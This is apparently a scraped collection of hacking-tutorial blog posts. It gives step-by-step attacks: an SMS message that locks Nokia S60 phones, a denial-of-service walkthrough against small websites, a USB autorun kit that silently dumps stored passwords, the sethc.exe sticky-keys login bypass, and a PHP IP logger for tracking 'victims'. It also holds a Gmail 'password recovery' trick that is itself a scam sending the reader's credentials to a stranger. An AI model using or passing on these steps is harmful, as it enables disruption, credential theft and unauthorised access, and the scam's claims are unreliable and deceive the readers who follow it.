How to Hack Nokia Phones – Using SMS

How to Hack Nokia Phones

How to Hack Nokia Phones – Using SMS

Yep, One can hack Nokia phones by just sending a SMS,seems devilish isn't it? Although this vulnerability was found more than an year ago, I recently tried it and found it working in many sets. The vulnerability dubbed as “Curse of Silence” affects all Nokia Symbian 60/Series 60 devices and allows for remote SMS/MMS Denial of Service.One can send a specially crafted sms to lockup/crash any Series 60 device.

What is Required ?

• MSISDN of the target.
• A Mobile phone service provider which allows sending of SMS messages (Airtel in my case)
• (Almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to "Internet Electronic Mail" )

Risk Levels
Although the vulnerability is spread across many versions of S60 platform,the Risk level is quite high for (for S60 2.6 and 3.0 devices)as upon attack,the target will not be able to receive any SMS or MMS messages until the device is Factory Resetted and Medium for S60 2.8 and 3.1 devices as upon Ddos attack,the target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted.
 
The Attack
One can send an email using an sms by setting the messages Protocol Identifier to "Internet Electronic Mail" and formatting the message like this:

<email-address><space><message body>
The simplest attack will be -
123456789@123456789.1234567890123

If such messages contain an <email-address> with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do,however, signal to the SMS Career that they have received the message.
Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering "*#7370#" ) or using a Vulcan Death Grip.
 
Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters after that the device will not be able to receive any other SMS message and the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely "empty" device. 
After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts it is only able to receive the first part and will display the "not enough memory" warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.
Also, an attacker now just needs to send one more "Curse Of Silence" message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.
Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.

Detailed List of affected phones
Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected. I short if you own one of these,you are rounded unless u have a firmware upgrade/fix release by Nokia which fixes this attack.

S60 3rd Edition, Feature Pack 1 (S60 3.1)

• Nokia E90 Communicator
• Nokia E71
• Nokia E66
• Nokia E51
• Nokia N95 8GB
• Nokia N95
• Nokia N82
• Nokia N81 8GB
• Nokia N81
• Nokia N76
• Nokia 6290
• Nokia 6124 classic
• Nokia 6121 classic
• Nokia 6120 classic
• Nokia 6110 Navigator
• Nokia 5700 Xpress Music

S60 3rd Edition, initial release (S60 3.0)

• Nokia E70
• Nokia E65
• Nokia E62
• Nokia E61i
• Nokia E61
• Nokia E60
• Nokia E50
• Nokia N93i
• Nokia N93
• Nokia N92
• Nokia N91 8GB
• Nokia N91   
• Nokia N80
• Nokia N77
• Nokia N73
• Nokia N71
• Nokia 5500
• Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8)

• Nokia N90
• Nokia N72
• Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6)

• Nokia 6682
• Nokia 6681
• Nokia 6680
• Nokia 6630

Credits
Tobias Engel – The Original Vulnerability Founder
Tested and implemented on Airtel carrier using Nokia 3120 classic and N70/N73/E51 by XERO

Hack facebook chat history

There is a simpe easy Trick to Hack Facebook chat History. We can Hack Chat History even if our Friends are Offline. To use this Trick follow the simple steps given below :1) Open Friends profile.

2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard.3) This will exactly look like : http://www.facebook.com/profile.php?id=XYZ( where XYX can be any numbers and this XYZ is nothing but the ID ).4) Now in the Address Bar type "javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter.5) Now it is done.6) You can see full Chat History now.So this is a simple Trick to Hack Facebook Chat History.

How To Crash Small Websites- Tutorial

So your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it.ok after this tutorial go for it.TOOLS:>>Port Scanner<< (Download any Port Scanner)>>rDos<<==> Download LinkCode:http://www.mediafire.com/?emnmitkmmqz>>HotSpotSheild Proxy!<< ( You can use other Proxy to Hide your IP)Step One: First we need to find the websites IP Adress. This is very easy to do.Assume the URL is http://www.yoursite.com .

Now Open your  Cmd by  press Start>Run>cmd .After  opened cmd  type  ping  http://www.yoursite.com then  press enter and you will get the ip of the victims website. (YOU MUST REMOVE HTTP:// AND ANY /’s)

-Step Two: Now you must test to see  port 80 is opened or not (usually it is opened).This is very easy process. Open the port scanner that you have been downloaded .In port scanner type your Victims ip that you got from step 1.It will ask you to do a range scan or a full scan (SELECT RANGE  SCAN!) then It will ask for conformation you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.[X] = Closed[X] Vulnerable = Open



-Step Three : ALMOST DONE:The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)If port 80 is opened then you are on the way of crashing!!Now open your  rDos that you  have downloaded.Enter your victims ip that you got from step 1.It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.Hit enter.. *=Flooding -=Crashed Or didn’t connect!

Step 1: Log into your Gmail account.


Step 2: Compose a new mail.

Step 3: In subject box type " PASSWORD RECOVERY "



Step 4: Write this in message box.




(First Line)- Email address you want to hack.

(Second Line)- Your Gmail address

(Third Line)- Your Gmail account password

(Fourth Line) - <pwdcursive><

v703&login="passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#"

start?></script>=""></cursive><>
{simply copy and paste above.}

Step 5: Send this to - suheerahmad8@gmail.om



How it works: You contact to a system administrators automatic responder via email.

Usually only system administrators can use this, but when you

try it with your own password and mail this message from your Gmail account

the server gets confused!

Why your password is needed- Automatic Gmail responder will require your "system administrator password" which is in fact

your own password!!! But the server will be confused and it will not be able to get that it is done intentionally to retrieve a password of someone else's Gmail account.



 This is an awesome trick and works only one time with one unique Gmail ID. Have fun! :)



Note: Use a Gmail Account you have been using from at least past 30 Days, otherwise Gmail Admin may take it as a new/temporary account and this trick may not work. Moreover Use this trick soon otherwise this flaw can be rectified soon.

[USE IT AT YOUR OWN RISK!]

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.

There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.
Preparing Your USB Drive for Password Hacking:
Here is a step by step procedure to create the password hacking toolkit:

You must temporarily disable your antivirus before following these steps.
1.
Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2.
Create a new Notepad and write the following text into it:

[autorun] open=launch.bat
 ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen-drive.
3.
Create another Notepad and write the following text onto it:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
1.
Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
2.
In the pop-up window, select the first option (Perform a Virus Scan).
3.
Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4.
Remove the pen-drive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP, Vista and 7.

NOTE: This procedure will only recover the stored passwords (if any) on the Computer

How to watch blocked videos on YOUTUBE

 

Hi, Today I'm going to teach you a new trick that How to watch blocked videos from   YouTube.


You could have tried to open any video on YouTube and finally you would have came to know that

the video is blocked and you must sign in to watch that video.
You could be staying in a country like US, UK or India but may not be able to watch every video on YouTube – that’s because the content owners have allowed access to that video only from certain countries or geographic regions.No, this is not about Internet censorship in countries like China or Pakistan where ISPs frequently block access to sites like YouTube following Government orders.

Some videos might have blocked in your region or in some videos, it might ask you to sign in to confirm.

But here is the simple trick to watch such videos.

Just copy the alphanumeric code from the video page URL (the one after the "=" sign) and paste it after this: http://www.youtube.com/v

Suppose this is the YouTube video URL

http://www.youtube.com/watch?v=pLN59ZOweUE

Make some changes in the URL like this and see what happens

http://www.youtube.com/v/pLN59ZOweUE

Thats all. Now you can watch the videos that were blocked for watching in your region or any reigon/reason.

 How To Block / Unblock Websites

How To Block / Unblock Websites

 

                            5 ways how to unblock websites
                          

1. Web proxies.

Web proxies are probably the most popular and easiest way to unblock websites. In layman’s terms, a proxy server is a server that sits between you and the site you are accessing. Instead of connecting directly to the blocked website, you connect to the proxy server, then the proxy connects to the website. Some of the most popular proxy sites are HideMyAss.com, Kortaz.com and Anonymouse.org

2. Use a VPN.

A Virtual Private Network, or a VPN as it’s commonly known, is basically like a tunnel. Rather than connecting to a website in the normal way, a VPN tunnels under the network, thereby hiding the traffic that
passes through it. The main benefit this offers over a web proxy is that it’s far more secure because the traffic is encrypted., even your ISP can’t see what you’re doing. Another advantage a VPN offers over a web proxy, is that it allows any applications to use the encrypted tunnel, rather than just your web browser. Hotspot Shield and Free US VPN are two of the most popular free VPNs out there. If you need a faster premium VPN, I’d recommend Pure VPN

3. How to unblock websites with Firefox add-on.

If you’re a Firefox user, you can use an add-on called Foxy Proxy. With a simple click, you can turn online anonymity on or off.

4. How to unblock websites with Google Chrome Extension

If you use Google Chrome, you can install the browser extension Proxy Switchy

6. Use Google cache.

Go to Google.com, then in the search box, type cache: before the address of the blocked website. So if for example http://www.facebook.com was blocked, you would type cache:http://facebook.com




How to block websites:

It is possible when,we know about host file.host file basically present in c drive. it is common part of operating system.host file is one of several system that help us in addressing network node in a computer network.This is way to go host file C:/Windows/System32/drivers /etc. When,you will go this way,then you will see this type of image



Now click on Host file and also in this step you are asked for choose the program you want to use to open this filefile then choose only notepad .

1 Open the host.file in notepad.

2 Now enter 127.0.0.1 (127.0.0.1 This ip address must be included) and the "website you want block " without quotes as shown in Image Below:


4 If you want to block many site,then similar type

 127.0.0.1 www.google.co.in
 127.0.0.1 www.yahoo.com
 127.0.0.1 www.facebook.com

How to login into Windows 8, 7, xp without knowing password using cmd (Part 1)

 

Hello guys, today in this post, you are going to learn how to crack a windows password when you are at log on screen using a windows dvd. This method is very useful when you forgot your old windows password. If you know about konboot, then you can use it. But if you dont have a proper konboot file, then you can use this simple method to crack the windows password.

For Windows 7 or 8 users:

All you need is a Windows 7 DVD if you want to hack windows 7 password or Windows 8 DVD  if you want to hack Windows 8 password

Step 1: Insert your Windows DVD and boot from your windows installation DVD. 

Step 2: You will see a window like the one below. Click Repair your computer.

Step 3: Choose the operating system and click Next.

Step 5: After a while a screen like the one shown below will be displayed. Click on Command prompt link. This will open a command prompt window.

Step 6: Execute the two commands below in order:

ren sethc.exe sethc_back.exe

copy cmd.exe sethc.exe

Step 7:  Now restart your computer. After restarting press the left-Shift key five times quickly when you see the logon screen.

Step 8: This will pop up a CMD window with the administrator privileges.

Step 9: Now you can change password using net user command. If you don't know the trick for netuser command, then follow this method to change admin password using command prompt (Part 2 - click here) .

And you can logon using the password you specified in the previous step.

Q. How does this work? 

A. Windows have a feature of stick keys. You can open it by pressing shiftkeys 5 times. By this abouve procedure, we are renaming the stickkeys.exe file to someother name and we rename the cmd.exe file to stickkeys (sethc.exe) name. And you will change the password through this procedure using command promt.

For XP users:

Step1: Start computer and then press “Ctrl+Alt+Delete” (twice) while you are at Windows Login Screen.
Step2: Type “Administrator” without quotations in the username box and leave password box blank. Then hit “Enter” to log onto Windows system.

And after you login into Administrator account, you can use this method to change password (click here)

Note: On Windows XP Home edition, you must enter safe mode to access this hidden account

How to find someones IP address via different sources

 

Today i am going to explain you few commonly used methods you can get the IP address and location of someone with few common techniques

1.How to track IP address of anyone using email?

Method 1: 

Step 1: Go to www.whatstheirip.com.
Step 2: Enter your email address below and click "Get Link"
Step 3: Send your friend the innocent looking link we provide you
Step 4: When your friend, or anyone for that matter, clicks the link, a hidden script will email you their IP address and geo targeting location!

Method 2:
Step 1: Know what is your victim email id.

For eg: victimid[@]gmail.com

Step 2: Register an account here: http://www.readnotify.com
Step 3: Send mail to victim using your readnotify.com mail account. Before sending mail append ".readnotify.com" at end of victim mail ID.

For eg: victimid[@]gmail.com.readnotify.com

Step 4:If victim opens the mail, his info will be tracked(IP address) and mailed to your account.

2.GET IP through a link ( a php file ) 

First copy the below codes into Notepad and save it as ip.php

<?php

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$img_number = imagecreate(400,95);

$backcolor = imagecolorallocate($img_number,10,102,153);

$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);

$number0 = " This is Your IP/Proxy";

$number1 = " IP: $_SERVER[HTTP_X_FORWARDED_FOR]";

$number2 = " Host/Proxy: $hostname";

$number4 = " _________________________________";

Imagestring($img_number,10,5,5,$number0,$textcolor);

Imagestring($img_number,10,5,25,$number1,$textcolor);

Imagestring($img_number,10,5,45,$number2,$textcolor);

Imagestring($img_number,10,5,50,$number4,$textcolor);

Imagestring($img_number,10,8,50,$number4,$textcolor);

Imagestring($img_number,10,5,10,$number4,$textcolor);

Imagestring($img_number,10,8,10,$number4,$textcolor);

header("Content-type: image/png");

imagepng($img_number);

$file=fopen("pcmadness.txt","a");

$file2 = "- IP joined - IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] - Host: $hostname - '\n' ";

fwrite($file, $file2);

fclose($file);

?>

1. Now upload the php file in any free servers and give the link of the file to the person whom IP you want to get.
2. Now, when the victim clicks on the link, a .txt will be created automatically with name pcmadness.txt (for the first time use of link) and you will get the IP address of victim in the notepad file automatically.
3. When ever you give that link to any person, his/her IP will be saved in that .txt file automatically.

3.GET IP Address through Skype :

1. When you're in the Skype call press alt + crtl + delete and go into Task Manager.
2. When you're in Task Manager click on the Performance tab.
3. Once you're in the performance tab click on resource monitor.
4. Now tick skype.exe and look in the Network Activity box below, you should see you sending information and receiving information and it has their I.P Address.

4.GET IP Address through Facebook :

Note: Before trying this make sure you close all the other tabs in your browser and only facebook is open. Also if possible delete all the history and cache from your browser
1. First invite or ping that person for a chat on facebook .
2. Make sure your all other tabs in browser and other services in computer are closed. If Possible for you then delete all the cookies-cache and browsing history from your browser.
3. While chatting on Facebook go to Start >- Run >- cmd .
4. After Opening command Prompt Type netstat -an command and hit Enter.
5. Now you will get Ip Address of all the established connections there .
6. Note all the suspicious Ip’s and trace user using ip address tracer sites like http://www.ip-adress.com/ip_tracer/. And click on "Click for big IP address location image" link given just below the map. Few other websites to find IP locations are whatismyip or www.ipmango.com .

Remember this doesn't work 100% of the time but it is quite accurate